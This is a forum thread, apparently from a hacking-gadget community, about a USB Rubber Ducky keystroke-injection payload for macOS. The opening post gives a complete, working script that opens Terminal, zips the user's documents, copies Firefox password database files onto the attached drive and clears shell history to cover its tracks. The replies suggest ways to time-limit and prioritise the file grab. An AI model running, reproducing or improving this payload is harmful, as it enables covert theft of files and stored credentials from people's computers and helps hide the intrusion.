Jump to content

Recommended Posts

Posted

I am running this as we speak:

https://forums.hak5.org/index.php?/topic/28626-payload-osx-thread-first-reverse-shell-payload/?p=218073

REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks

DELAY 2000

GUI SPACE

DELAY 300

STRING terminal

ENTER

DELAY 1000

STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit;

ENTER

GUI m

is there a way to limit this to grab as many files as possible in say 60 seconds? I am testing this out and my one computer has LOTS of files and it's taking a very long time.

  • 2 weeks later...
Posted (edited)

That looks like unix or linux or something. If you were using a windows script I would say stick it in a batch file (shell file), run it, time out for 60 seconds, then kill the process. In batch, I think if you replace call with start (in batch, Windows) it will run them concurrently. Another way you could do this is to make an executable program that keeps a list of files and removes files as they are added to the exfiltration drive, and does some kind of exception handling when the drive is removed prematurely. You will still have a file that is corrupted on the exfiltration drive. If you go the executable route, have a list of file extension targets, and make the list you add the files to insert in a sorted order using some kind of binary insertion algorithm (using the file size as the key). I am sure there are downsides to using your own executable though.

Edited by overwraith
  • 2 weeks later...
Posted

In bash you might be able to run that with a python script coinciding so that you can terminate the process when a specific time limit has been reached.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...